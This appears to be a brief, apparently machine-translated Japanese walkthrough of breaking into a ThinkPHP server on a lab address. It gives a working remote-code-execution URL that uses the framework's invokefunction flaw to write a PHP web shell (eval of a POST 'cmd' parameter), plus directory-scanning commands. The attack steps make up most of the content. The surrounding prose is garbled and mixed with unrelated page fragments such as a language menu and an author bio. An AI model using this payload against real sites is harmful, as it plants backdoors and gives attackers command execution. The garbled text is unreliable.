私の連絡先情報
郵便メール:
2024-07-12
한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina
目次
怪しいパスを試してみたらthinkphpのフレームワークだったのでバージョンもわかったので翌日戦いましょう。
編集してphpに正常に書き込み、翌日にはそれを取得するだけです編集
dirsearch、dirb、gobuster などのツールを試すことができます
dirb http://192.168.20.130/
http://192.168.20.130/public/index.php?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST['cmd']);?>
php に正常に書き込まれたので、簡単に取得できます。http://192.168.20.130/public/shell.php
彼は 30 年以上テクノロジーの研究に専念しており、java、linux、javascript、php、css などのさまざまな言語に堪能であり、オープンソース分野で多くの貢献を行っています。将来の参考のために技術開発におけるいくつかの問題を共有する開発者ドキュメント ステーション。
郵便メール: